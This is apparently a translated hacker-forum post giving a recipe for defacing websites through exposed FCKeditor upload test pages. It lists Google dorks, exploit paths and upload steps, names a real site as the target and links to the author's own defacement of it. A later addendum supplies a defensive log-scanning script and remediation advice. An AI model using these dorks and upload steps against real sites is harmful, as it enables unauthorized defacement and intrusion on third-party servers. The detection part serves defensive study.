Hmm, this time akyra will post about defacing a website using the FCKeditor method.
The dorks (just try them out):
- inurl:/editor/editor/filemanager/
- inurl:/HTMLEditor/editor/"
- inurl:/HTMLEditor/editor//filemanager/
- inurl:/HTMLEditor/editor/filemanager/connectors/
Exploit: http://[target.com]/editor/editor/filemanager/upload/test.html
http://[Target.com]/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html
Enter the dorks above into Google and look for a target. If you find one,
e.g.: http://www.centerkennedy.com.br/moveiseletro/editor/editor/filemanager/
append the exploit path above,
so it becomes:
e.g.: http://www.centerkennedy.com.br/moveiseletro/editor/editor/filemanager/upload/test.html
At [Select the "File Uploader" to use: ] <----- choose PHP
Then upload your HTML file.
Click "send it to server". If it succeeds and the file is uploaded, the [Uploaded File URL:] box will show the path where your file was uploaded.
e.g.: what appears in the [Uploaded File URL:] box: /UserFiles/html_kamu.html
The result is then at http://[target.com]/editor/html_kamu.html
Easy, right? Hehehehe
Here is the result of my deface :D
http://www.centerkennedy.com.br/editor/images/anon_knight.html
Source: Hacker Indonesia
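The upload flow described above leaves a recognizable trail in a web server access log: a request for the uploader test page, a POST under the file manager path, then a fetch of an .html file under /UserFiles/. The detection sketch below is an added example, not part of the original post. The log lines, the POST handler name and the uploaded file name are constructed, and a 2xx status on the POST is only a hint to be confirmed on disk.

```python
import re

# Constructed sample lines in "combined" access-log format (not real traffic).
# HANDLER_PLACEHOLDER and index_new.html are made-up names for illustration.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2024:10:00:01 +0000] "GET /editor/editor/filemanager/upload/test.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2024:10:00:09 +0000] "POST /editor/editor/filemanager/upload/php/HANDLER_PLACEHOLDER HTTP/1.1" 200 310 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2024:10:00:15 +0000] "GET /UserFiles/index_new.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.20 - - [10/Mar/2024:10:01:00 +0000] "GET /HTMLEditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 404 199 "-" "curl/8.0"
192.0.2.33 - - [10/Mar/2024:10:02:00 +0000] "GET /products/editor-notes.html HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')
# The two test pages named in the post, under any install prefix.
TEST_PAGE_RE = re.compile(
    r"/editor/filemanager/(?:upload/test\.html|connectors/uploadtest\.html)$", re.I)
FILEMANAGER_RE = re.compile(r"/editor/filemanager/", re.I)
USERFILES_RE = re.compile(r"/UserFiles/[^?]*\.html?$", re.I)

def scan(log_text):
    """Return (client, finding, path) tuples for FCKeditor uploader activity."""
    findings, uploaders = [], set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        client, method, target, status = m.groups()
        path = target.split("?", 1)[0]
        ok = status.startswith("2")
        if method == "GET" and TEST_PAGE_RE.search(path):
            # A 2xx here means the test page is still deployed and reachable.
            findings.append((client, "test-page-exposed" if ok else "test-page-probe", path))
        elif method == "POST" and FILEMANAGER_RE.search(path):
            if ok:
                uploaders.add(client)
            findings.append((client, "upload-post-2xx" if ok else "upload-post-rejected", path))
        elif method == "GET" and ok and client in uploaders and USERFILES_RE.search(path):
            # Same client fetching HTML from the upload directory after a POST.
            findings.append((client, "uploaded-file-fetched", path))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="\t")
```

Any "test-page-exposed" finding means the test pages shipped with the editor are still on the server; removing them and restricting the file manager connectors to authenticated users closes the path the post relies on.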